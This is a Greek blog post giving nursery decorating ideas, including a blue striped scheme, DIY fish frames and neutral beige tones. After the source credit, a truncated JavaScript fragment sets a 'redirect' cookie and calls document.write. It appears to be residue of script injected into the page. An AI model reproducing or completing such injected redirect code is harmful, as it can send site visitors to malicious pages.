Το πρώτο δωμάτιο του μωρού σας

Είστε έτοιμοι να υποδεχθείτε τον…πελαργό αλλά δεν ξέρετε τί να κάνετε με το πρώτο δωμάτιο του μωρού σας?

Μη τα βάψετε μαύρα αλλά…γαλάζια!

Χρησιμοποιείστε το γαλάζιο χρώμα σε όλους τους τοίχους του δωματίου. Στον κεντρικό τοίχο – εκεί δηλ. όπου θα τοποθετήσετε την κούνια- προσθέστε οριζόντιες ρίγες διαφορετικού πάχους σε τυρκουάζ, λαχανί και λευκό. Προτιμήστε όλα τα ξύλινα έπιπλα να είναι σε λευκό χρώμα. Φροντίστε να τοποθετήσετε τη κούνια του μωρού σας κοντά στο παράθυρο ή τη μπαλκονόπορτα ώστε να επηρρεάζεται από τις αλλαγές του φωτός στη διάρκεια της ημέρας. Δίπλα της καλό θα είναι να βρίσκεται μία άνετη πολυθρόνα σε λαχανί χρώμα – θα σας φανεί χρήσιμη τόσο για το θηλασμό όσο και τα βράδια που το βλαστάρι σας θα έχει αυπνίες.

Δημιουργείστε τα δικά σας παιδικά κάδρα: θα χρειαστείτε μόνο δύο λευκά καδράκια, και τρία χαρτόνια σε γαλάζιο, λαχανί και πορτοκαλί χρώμα. Στο πορτοκαλί χαρτόνι σχεδιάστε δύο όμοια περιγράμματα ψαριών, κόψτε τα και στη συνέχεια κολλήστε τα στο γαλάζιο και το λαχανί χαρτόνι. Τοποθετήστε τα έργα σας στα λευκά κάδρα και κρεμάστε τα πάνω από τη κούνια του μωρού σας.

Ολοκληρώστε τη διακόσμηση του δωματίου με κουρτίνες σε λαχανί χρώμα, ένα πορτοκαλί χαλάκι και πολλά λούτρινα παιχνίδια.

Αλλά και Ουδέτεροι τόνοι για το μωρό σας

 

 

 

 

 

 

 

Αν έχετε αποφασίσει -σε πείσμα των καιρών- να μην μάθετε το φύλο του παιδιού σας πριν τη γέννησή του ή για οποιοδήποτε λόγο δεν μπορείτε να προχωρήσετε στο βάψιμο του παιδικού δωματίου σε ένα έντονο χρώμα, τότε σίγουρα η λύση της διακόσμησης σε ουδέτερους τόνους θα σας λύσει τα χέρια.

Άλλωστε είναι ο πιο εύκολος τρόπος να δημιουργήσετε ένα εξαιρετικά καλαίσθητο και γεμάτο ρομαντικές αναφορές χώρο για το βρεφάκι σας.

Για τους τοίχους επιλέξτε εκρού, κρεμ, απαλούς τόνους του μπεζ.

Τα κύρια έπιπλα καλό θα ήταν να είναι λευκά και να έχουν ένα country χαρακτήρα .

Χρησιμοποιήστε  γήϊνα χρώματα στα ράφια, τις κρεμάστρες, τις κορνίζες, τα καλάθια που θα συμπληρώσουν λειτουργικά τη διακόσμηση του δωματίου.

Τέλος, φροντίστε η λεγόμενη ‘προίκα’ του μωρού, δηλ. σεντόνια, κουβερτούλες, πάντες και κουνουπιέρα να κινούνται σε διάφορους τόνους του μπεζ.

Πηγή: spitikaidiakosmisi.blogspot.com
cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘

You may also like...

Leave a Reply